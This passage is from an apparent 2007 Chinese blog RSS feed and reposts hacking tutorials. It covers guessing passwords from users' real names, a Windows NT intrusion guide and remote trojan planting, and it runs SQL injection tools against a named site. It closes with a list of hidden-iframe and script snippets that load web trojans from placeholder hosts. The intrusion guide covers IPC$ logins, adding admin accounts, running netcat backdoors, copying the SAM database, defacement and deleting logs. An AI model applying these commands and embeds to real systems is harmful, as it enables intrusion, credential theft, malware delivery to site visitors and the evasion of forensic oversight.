href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试. <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;只有<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>还不能进入系统,但有了<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>的那你应该会发现该用户的许多信息,例如: <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;......... <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;qingyuan:x:275:50::/usr/qingyuan:/bin/sh <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;kyc:x:293:50:Department of Science &amp; Technology:/usr/kyc:/bin/sh <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;............ <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;这是一部分PASSWD,从这儿我们可以得到七个<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的. <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;如果是用其他方法获得<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>的,就用FINGER查询来获得相关信息.例如知道一个<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>support,我们就用<a href="http://www.3800cc.com/"><font color="#000000">网络</font></a>刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>的信息例如真名实姓,电话号码等就用这些做密码来猜&quot;&gt;如果是用其他方法获得<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>的,就用FINGER查询来获得相关信息.例如知道一个<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>support,我们就用<a href="http://www.3800cc.com/"><font color="#000000">网络</font></a>刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>的信息例如真名实姓,电话号码等就用这些做密码来猜. <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;当然最可能的密码还是<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>本身和一些<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>的变形,如<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的. <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好. <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;最后实在不行还有一种比较卑劣的手段，就是给该网站的网管写封信，想办法骗他执行特洛伊木马，然后再.......算了,不说了. <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我<img height="1" src="file:///E:/3(文章类)/每日精华/如何得到别人的上网帐号和密码.files/down_info.htm" width="1" border="0" /></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>]]></description>
		</item>
		    
		
		<item>
			<title>net命令入侵</title>
			<link>http://caipei06.blog.sohu.com/41606080.html</link>
			<comments>http://caipei06.blog.sohu.com/41606080.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Wed, 11 Apr 2007 20:25:19 +0800</pubDate>
			<category>网络学习</category>
			<guid>http://caipei06.blog.sohu.com/41606080.html</guid>
			<description><![CDATA[<p>只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！ <br /><br />这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1 <br /><br />net use \127.0.0.1ipc$ &quot;123456&quot; /user:&quot;hbx&quot; <br /><br />退出的命令是 <br /><br />net use \127.0.0.1ipc$ /delte <br /><br />下面的操作你必须登陆后才可以用.登陆的方法就在上面. <br /><br />---------------------- <br /><br />下面我们讲怎厶创建一个用户，由于SA的权限相当于系统的超级用户. <br /><br />我们加一个heibai的用户密码为lovechina <br /><br />net user heibai lovechina /add <br /><br />只要显示命令成功,那厶我们可以把他加入Administrator组了. <br /><br />net localgroup Administrators heibai /add <br /><br />---------------------- <br /><br />这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. <br /><br />net use z:\127.0.0.1c$ <br /><br />---------------------- <br /><br />net start telnet <br /><br />这样可以打开对方的TELNET<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>. <br /><br />---------------------- <br /><br />这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。 <br /><br />net user guest /active:yes <br /><br />---------------------- <br /><br />这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！ <br /><br />net user guest lovechina <br /><br />net命令果然强大啊！ <br /><br />2:at <br /><br />一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎厶启动他呢？ <br /><br />那厶需要用AT命令，这里假设你已经登陆了那个<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>器。 <br /><br />你首先要得到对方的时间， <br /><br />net time \127.0.0.1 <br /><br />将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其ID=1 <br /><br />at \127.0.0.1 12:3 nc.exe <br /><br />这里假设了一个木马，名为NC.EXE,这个东西要在对方<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>器上. <br /><br />这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>,端口为99. <br /><br />等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. <br /><br />3:telnet <br /><br />这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. <br /><br />telnet 127.0.0.1 99 <br /><br />这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. <br /><br />4:FTP <br /><br />它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后，它会给用户名,密码,以及FTP<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>器. <br /><br />在上传前需要登陆先，这里我们假设FTP<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>器是WWW.51.NET,用户名是HUCJS,密码是654321 <br /><br />ftp www.51.net <br /><br />他会要求输入用户,成功后会要求输入密码. <br /><br />---------------------- <br /><br />下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:下,传到对方D: <br /><br />get c:index.htm d: <br /><br />假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下</p>
<p>
<table cellspacing="0" cellpadding="0" align="center" border="0">
<tbody>
<tr>
<td bgcolor="#cccccc" height="1"></td></tr>
<tr>
<td valign="top"><br />
<table style="TABLE-LAYOUT: fixed; WORD-BREAK: break-all" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td>

<br />put c:index.htm d: <br /><br />5:copy <br /><br />下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。 <br /><br />这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 <br /><br />copy index.htm \127.0.0.1c$index.htm <br /><br />---------------------- <br /><br />如果你要复制到D盘下把C改为D，就行了！ <br /><br />copy index.htm \127.0.0.1d$index.htm <br /><br />---------------------- <br /><br />如果你要把他复制到WINNT目录里 <br /><br />就要把输入 <br /><br />copy index.htm \127.0.0.1admin$index.htm <br /><br />admin$是winnt <br /><br />---------------------- <br /><br />要把对方的文件复制过来，顺便告诉大家NT的备份的<a href="http://www.3800cc.com/"><font color="#000000">数据</font></a>库放在x:winnt <br />epairsam._ sam._是<a href="http://www.3800cc.com/"><font color="#000000">数据</font></a>库的文件名 <br /><br />下面就把127.0.0.1的<a href="http://www.3800cc.com/"><font color="#000000">数据</font></a>库复制到本地C盘下 <br /><br />copy \127.0.0.1admin$ <br />epairsam._ c: <br /><br />---------------------- <br /><br />6∶set <br /><br />如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！ <br /><br />下面是我得到的结果！我来分析它，只是找主页在那而已。 <br /><br />COMPUTERNAME=PENTIUMII <br />ComSpec=D:WINNTsystem32cmd.exe <br />CONTENT_LENGTH=0 <br />GATEWAY_INTERFACE=CGI/1.1 <br />HTTP_ACCEPT=*/* <br />HTTP_ACCEPT_LANGUAGE=zh-cn <br />HTTP_CONNECTION=Keep-Alive <br />HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了 <br />HTTP_ACCEPT_ENCODING=gzip, deflate <br />HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) <br />NUMBER_OF_PROCESSORS=1 <br />Os2LibPath=D:WINNTsystem32os2dll; <br />OS=Windows_NT <br />Path=D:WINNTsystem32;D:WINNT <br />PATHEXT=.COM;.EXE;.BAT;.CMD <br />PATH_TRANSLATED=E:vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:vlroot <br />PROCESSOR_ARCHITECTURE=x86 <br />PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel <br />PROCESSOR_LEVEL=6 <br />PROCESSOR_REVISION=0303 <br />PROMPT=$P$G <br />QUERY_STRING=/c+set <br />REMOTE_ADDR=XX.XX.XX.XX <br />REMOTE_HOST=XX.XX.XX.XX <br />REQUEST_METHOD=GET <br />script_NAME=/scripts/..%2f../winnt/system32/cmd.exe <br />SERVER_NAME=XX.XX.XX.XX <br />SERVER_PORT=80 <br />SERVER_PORT_SECURE=0 <br />SERVER_PROTOCOL=HTTP/1.1 <br />SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 <br />SystemDrive=D: <br />SystemRoot=D:WINNT <br />TZ=GMT-9 <br />USERPROFILE=D:WINNTProfilesDefault User <br />windir=D:WINNT <br /><br />粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那厶这就是主页的名称了。</td></tr></tbody></table>
<p>7∶nbtstat <br /><br />如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。QQ:9750406顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！ <br /><br />现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。 <br /><br />命令是 <br /><br />nbtstat -A XX.XX.XX.XX <br /><br />-A一定要大写哦。 <br /><br />下面是得到的结果。 <br /><br />NetBIOS Remote Machine Name Table <br /><br />Name Type Status <br />--------------------------------------------- <br />Registered Registered Registered Registered Registered Registered Registered Reg <br />istered Registered Registered Registered <br />MAC Address = 00-E0-29-14-35-BA <br />PENTIUMII &lt;00&gt; UNIQUE <br />PENTIUMII &lt;20&gt; UNIQUE <br />ORAHOTOWN &lt;00&gt; GROUP <br />ORAHOTOWN &lt;1C&gt; GROUP <br />ORAHOTOWN &lt;1B&gt; UNIQUE <br />PENTIUMII &lt;03&gt; UNIQUE <br />INet~Services &lt;1C&gt; GROUP <br />IS~PENTIUMII...&lt;00&gt; UNIQUE <br />ORAHOTOWN &lt;1E&gt; GROUP <br />ORAHOTOWN &lt;1D&gt; UNIQUE <br />..__MSBROWSE__.&lt;01&gt; GROUP <br /><br /><br />粉红色的就是登陆过这部系统的用户，可能你不知道怎厶看，大家是不是看到了一窜数字，只要这窜数字是&lt;03&gt;的话，那他前面的就是用户。 <br /><br />这里的用户是PENTIUMII。 <br /><br />8∶Shutdown <br /><br />关了对方的NT<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>器的命令 <br /><br />Shutdown \IP地址 t:20 <br /><br />20秒后将NT<a href="http://www.3800cc.com/"><font color="#000000">自动</font></a>关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。 <br /><br />9∶DIR <br /><br />这个命令没什厶好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。 <br /><br />你可以本地试下。 <br /><br />10∶echo <br /><br />著名的<a href="http://www.3800cc.com/"><font color="#000000">漏洞</font></a>Unicode，这个命令可以简单的黑一下有这个<a href="http://www.3800cc.com/"><font color="#000000">漏洞</font></a>的主机。 <br /><br />我们假设我们要把&ldquo;南京大屠杀铁证如山，任何日本人不得抵赖！&rdquo;写入index.htm，有2种方法，大家看看有什厶区别。 <br /><br />echo 南京大屠杀铁证如山，任何日本人不得抵赖！&gt;index.htm <br /><br />echo 南京大屠杀铁证如山，任何日本人不得抵赖！&gt;&gt;index.htm <br /><br />第一个的意思是覆盖index.htm原有的内容，把&ldquo;南京大屠杀铁证如山，任何日本人不得抵赖！&rdquo;写进index.htm。 <br /><br />第二个的意思是把&ldquo;南京大屠杀铁证如山，任何日本人不得抵赖！&rdquo;加到index.htm里面。 <br /><br />&ldquo;&gt;&gt;&rdquo;产生的内容将追加进文件中，&ldquo;&gt;&rdquo;则将原文件内容覆盖。 <br /><br />大家可以本地试下。 <br /><br />可能你会问，这样简单黑下有什厶好玩的，其实他可以用来下载主页到对方的目录里。 <br /><br />1、首先，我们需要申请一个<a href="http://www.3800cc.com/"><font color="#000000">免费</font></a>的主页空间。 <br /><br />2、用echo在可写目录下建立如下内容的txt文件∶（以chinren<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>器为例。） <br />open upload.chinaren.com（你的FTP<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>器，申请时你的空间提供商会给你的） <br />cnhack（你申请时的用户名） <br />test（你申请时的密码） <br />get index.htm c:inetpubwwwrootindex.htm（这里是把你空间上的index.htm下载到对方的c:inetpubwwwrootindex.htm） <br />bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS）</p>
<p>具体的做法∶ <br />输入 echo open upload.chinaren.com&gt; c:cnhack.txt <br />输入 echo cnhack &gt;&gt; c:cnhack.txt <br />输入 echo 39abs &gt;&gt; c:cnhack.txt <br />输入 echo get index.htm c:inetpubwwwrootindex.htm+&gt;&gt;+c:cnhack.txt <br />最后输入 ftp -s:c:cnhack.txt （利用ftp的-s参数，执行文件里的内容。） <br /><br />等命令完成时，文件已经下载到你指定的文件里了。 <br /><br />注意∶取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。） <br /><br />记得要 del c:cnhack.txt <br /><br />11:attrib <br /><br />这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。 <br /><br />attrib -r index.htm <br /><br />这个命令是把index.htm的只读属性去掉。 <br /><br />如果把&ldquo;-&rdquo;改为&ldquo;+&rdquo;则是把这个文件的属性设置为只读 <br /><br />---------------------- <br /><br />attrib +r index.htm <br /><br />这个命令是把index.htm的属性设置为只读。 <br /><br />12:del <br /><br />当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。 <br /><br />NT的日志有这些 <br /><br />del C:winntsystem32logfiles*.* <br />del C:winntssytem32config*.evt <br />del C:winntsystem32dtclog*.* <br />del C:winntsystem32*.log <br />del C:winntsystem32*.txt <br />del C:winnt*.txt <br />del C:winnt*.log <br /><br />只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘<br /><br />是否能懂，不懂的话联系我：itfk121@163.com</p></td></tr></tbody></table></p>]]></description>
		</item>
		    
		
		<item>
			<title>入侵之简单通俗的讲解</title>
			<link>http://caipei06.blog.sohu.com/40492544.html</link>
			<comments>http://caipei06.blog.sohu.com/40492544.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Tue, 3 Apr 2007 16:57:07 +0800</pubDate>
			<category>网络学习</category>
			<guid>http://caipei06.blog.sohu.com/40492544.html</guid>
			<description><![CDATA[<table cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td>
<table border="0">
<tbody>
<tr valign="center" align="middle">
<td style="WORD-BREAK: break-all" colspan="2" height="50"></td></tr>
<tr valign="center" align="middle">
<td style="WORD-BREAK: break-all" colspan="2" height="20"></td></tr>
<tr align="middle">
<td colspan="2">作者：不详 文章来源：华夏收集 点击数：

 726 更新时间：2007-3-27</td></tr></tbody></table></td></tr>
<tr>
<td style="WORD-BREAK: break-all" valign="top" colspan="2" height="300"><span style="FONT-SIZE: 14px; LINE-HEIGHT: 18px">
<table cellspacing="0" cellpadding="10" align="left" border="0">
<tbody>
<tr>
<td>

</td></tr></tbody></table>问：什么常见命令啊，什么工具啊，如何入侵，我还不会啊，能简单通俗的讲解一下吗？&nbsp; <br /><br />答：一般的初步入侵可以分为三步： <br />1，扫描目标主机并分析扫描信息。&nbsp;比如&nbsp;探测开放的端口，获得服务软件及版本，&nbsp;探测漏洞等等 <br />2，利用漏洞。探测并获取帐号或密码系统 <br />3，获得权限，进行操作。&nbsp; <br />不要太专业，太深入，太冗长，仅仅举个两个实际例子，不涉及任何高深知识，从工具角度来讲，但从中可以看出入侵的一般步骤： <br />一，入侵单机－－－普通攻击&nbsp;4个工具：&nbsp;1，shed.exe&nbsp;2，流光2000&nbsp;3，cmd.exe&nbsp;4，冰河8.4 <br />操作系统：winnt系统。&nbsp; <br />&ldquo;shed.exe&rdquo;：其实就是用来网上查共享资的，速度快，可以查到很多服务断的共享文件，不过在这里面有些ip在浏览器中无法访问，这是因为其中也包含了个人上网的ip． <br />&ldquo;流光&rdquo;：一些作网站和网吧的服务器一些目录都是共享的，有些是可以访问，但是不能删除，因为你所访问的都是以匿名访问的，权限不够！有些需要密码。遇到密码怎办？用流光！&nbsp;用流光的ipc探测，建立一个空对话，查到用户列表，然后先简单探测，此时有些网管懒惰，把administrator设置的过于简单，便可以抓到肉鸡了。 <br />使用冰河控制一台服务器速度很快，（因为服务器那边带宽很大）几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢？&nbsp;执行cmd.exe&nbsp;使用net命令具体操作如下： <br />第一步：net&nbsp;use&nbsp;\\ip\ipc$　&ldquo;password&rdquo;&nbsp;/user:&rdquo;user&rdquo;&nbsp;说明：以一个超级用户名与你想黑的网站建立联接，当然超级用户必须是该网站admin里的。这里的&rdquo;ip&rdquo;就是主机了，&ldquo;password&rdquo;就是超级用户的密码，&ldquo;user&rdquo;就是超级用户。比如：net&nbsp;use&nbsp;\\210.*.*.*\ipc$&nbsp;&ldquo;juntuan&rdquo;&nbsp;/user:&quot;juntuan&quot; <br />第二步：copy&nbsp;g-server.exe&nbsp;\\ip\admin$\system32&nbsp;说明：g-server.exe就是冰河的远程服务器端。意义：将此文件拷贝到对方的主机winnt里的system32目录里。最好用最新的<a href="http://www.77169.com/Article/List/List_41.html">木马</a>！哈哈，荷马以及教主还有很多人他们到处卖马呢，晕死......&nbsp; <br />第三步：net&nbsp;time&nbsp;\\ip&nbsp;察看对方的服务器时间。由于有时差，应该是一个小时吧！所以必须要以对方的服务器时间为准。&nbsp; <br />第四步：at&nbsp;\\ip&nbsp;time&nbsp;g-server.exe&nbsp;这里的time就是对方的主机时间。作用：在规定时间执行该程序。比如　at&nbsp;\\210.*.*.*&nbsp;19:55&nbsp;g-server.exe&nbsp;第五步：冰河就可以控制该电脑了。&nbsp; <br /><br />二，入侵网站－－－－<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>攻击 <br />工具：榕哥的<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>攻击工具包，在榕哥的站点http://www.netxeyes.com/main.html可以下载。&nbsp;下载来的这个工具包中总有两个小程序：&ldquo;wed.exe&rdquo;和&ldquo;wis.exe&rdquo;，其中&ldquo;wis.exe&rdquo;是用来扫描某个站点中是否存在<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>漏洞的；&ldquo;wed.exe&rdquo;则是用来破解<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>用户名密码的。两个工具的使用都非常简单，结合起来，就可以完成从寻找注入点到注入攻击完成的整个过程。 <br />1、寻找<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>点 <br />　　&ldquo;wis.exe&rdquo;使用的格式如下：&ldquo;wis.exe&nbsp;网址&rdquo;，：首先打开命令提示窗口，比如输入如下命令：&ldquo;wis.exe&nbsp;http://www.juntuan.cn/&rdquo;。在输入网址时，前面的&ldquo;http://&rdquo;和最后面的&ldquo;/&rdquo;是必不可少的，否则将会提示无法进行扫描。&nbsp;输入完毕后回车，即可开始进行扫描了。很快得到了扫描结果，可以看到某些网站中存在着很多<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>漏洞，我们随便挑其中一个来做试验。现在来对它进行<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>，破解出管理员的帐号来吧！ <br />2、<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>破解管理员帐号 <br />　&nbsp;现在进入命令窗口中，使用刚才下载的工具包中的&ldquo;wed.exe&rdquo;程序，命令使用格式为：&ldquo;wed.exe&nbsp;网址&rdquo;输入如下命令：&ldquo;wed.exe&nbsp;页面地址&rdquo;。回车后可看到命令运行情况。：这次输入网址时，最后面千万不要加上那个&ldquo;/&rdquo;，但前面的&ldquo;http://&rdquo;头也还是必不可少的。&nbsp; <br />　　可以看到程序自动打开了工具包中的几个文件，&ldquo;C:\wed\wed\TableName.dic&rdquo;、&ldquo;C:\wed\wed\UserField.dic&rdquo;和&ldquo;C:\wed\wed\PassField.dic&rdquo;，这几个文件分别是用来破解用户数据库中的字表名、用户名和用户密码所需的字典文件。当然我们也可以用其它的工具来生成字典文件，不过想想小榕哥以前出的&ldquo;黑客字典&rdquo;那么的强大，还用得着去多此一举吗？ <br />　　在破解过程中还可以看到&ldquo;SQL&nbsp;Injection&nbsp;Detected.&rdquo;的字符串字样，表示程序还会对需要注入破解的网站进行一次检测，看看是否存在<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>漏洞，成功后才开始猜测用户名。 <br />　　开始等待，很快就获得了数据库表名，然后得到用户表名和字长；再检测到密码表名和字长。然后&ldquo;wed.exe&rdquo;程序进行用户名和密码的破解。很快的，就得到了用户名和密码了。&nbsp; <br />3、搜索隐藏的管理登录页面 <br />　&nbsp;拿到了管理员的帐号，现在看来我们只有找到管理员登录管理的入口才行了。一般在网页上找遍了也没有看到什么管理员的入口链接，可以使用&ldquo;wis.exe&rdquo;程序，这个程序除了可以扫描出网站中存在的所有<a href="http://www.77169.com/Article/List/List_36.html">SQL注入</a>点外，还可以找到隐藏的管理员登录页面。&nbsp; <br />　管理员登录页面只可能隐藏在整个网站的某个路径下。于是输入&ldquo;wis.exe&nbsp;http://www.juntuan.cn/&nbsp;/a&rdquo;，对整个网站进行扫描。注意扫描语句中网址的格式。程序开始对网站中的登录页面进行扫描，在扫描过程中，找到的隐藏登录页面会在屏幕上以红色进行显示。很快就查找完了，在最后以列表显示在命令窗口中。 <br />　　在浏览器中输入网址，出现了本来隐藏着的管理员登录页面。输入用户名和密码，就进入到后台管理系统。 
<p></p></span></td></tr></tbody></table>]]></description>
		</item>
		    
		
		<item>
			<title>挂马代码大全</title>
			<link>http://caipei06.blog.sohu.com/40203423.html</link>
			<comments>http://caipei06.blog.sohu.com/40203423.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Sun, 1 Apr 2007 14:38:39 +0800</pubDate>
			<category>网络学习</category>
			<guid>http://caipei06.blog.sohu.com/40203423.html</guid>
			<description><![CDATA[<br />
<div style="FONT-SIZE: 12px">ps:检查文件是否被挂马的时候可以参考下！<br /><br />一:框架挂马<br /><br />&lt;iframe src=地址 width=0 height=0&gt;&lt;/iframe&gt; <br /><br />二:js文件挂马<br /><br />首先将以下代码<br />document.write(&quot;&lt;iframe width='0' height='0' src='地址'&gt;&lt;/iframe&gt;&quot;);<br />保存为xxx.js，<br />则JS挂马代码为<br />&lt;script language=javascript src=xxx.js&gt;&lt;/script&gt; <br /><br />三:js变形加密<br /><br />&lt;SCRIPT language=&quot;JScript.Encode&quot; src=http://www.xxx.com/muma.txt&gt;&lt;/script&gt; <br />muma.txt可改成任意后缀<br />四:body挂马<br /><br />&lt;body &gt;&lt;/body&gt;<br /><br />五:隐蔽挂马<br /><br />top.document.body.innerHTML = top.document.body.innerHTML + '\r\n&lt;iframe src=&quot;<a href="http://www.xxx.com/muma.htm/" target="_blank"><font color="#0000ff">http://www.xxx.com/muma.htm/</font></a>&quot;&gt;&lt;/iframe&gt;';<br /><br />六:css中挂马<br /><br />body { <br />background-image: url('javascript:document.write(&quot;&lt;script src=http://www.XXX.net/muma.js&gt;&lt;/script&gt;&quot;)')} <br /><br />七:JAJA挂马<br /><br />&lt;SCRIPT language=javascript&gt; <br />window.open (&quot;地址&quot;,&quot;&quot;,&quot;toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1&quot;); <br />&lt;/script&gt;<br /><br />八:图片伪装<br /><br />&lt;html&gt;<br />&lt;iframe src=&quot;网马地址&quot; height=0 width=0&gt;&lt;/iframe&gt;<br />&lt;img src=&quot;图片地址&quot;&gt;&lt;/center&gt;<br />&lt;/html&gt;<br /><br />九:伪装调用：<br /><br />&lt;frameset rows=&quot;444,0&quot; cols=&quot;*&quot;&gt;<br />&lt;frame src=&quot;打开网页&quot; framborder=&quot;no&quot; scrolling=&quot;auto&quot; noresize marginwidth=&quot;0&quot;margingheight=&quot;0&quot;&gt;<br />&lt;frame src=&quot;网马地址&quot; frameborder=&quot;no&quot; scrolling=&quot;no&quot; noresize marginwidth=&quot;0&quot;margingheight=&quot;0&quot;&gt;<br />&lt;/frameset&gt;<br /><br />十:高级欺骗<br /><br />&lt;a href=&quot;<a href="http://www.163.com/" target="_blank"><font color="#0000ff">http://www.163.com</font></a>(迷惑连接地址，显示这个地址指向木马地址)&quot; &gt; 页面要显示的内容 &lt;/a&gt;<br />&lt;SCRIPT Language=&quot;JavaScript&quot;&gt;<br />function www_163_com ()<br />{<br />var url=&quot;网马地址&quot;;<br />open(url,&quot;NewWindow&quot;,&quot;toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10&quot;);<br />}<br />&lt;/SCRIPT&gt;</div>]]></description>
		</item>
		    
		
	</channel>
</rss>
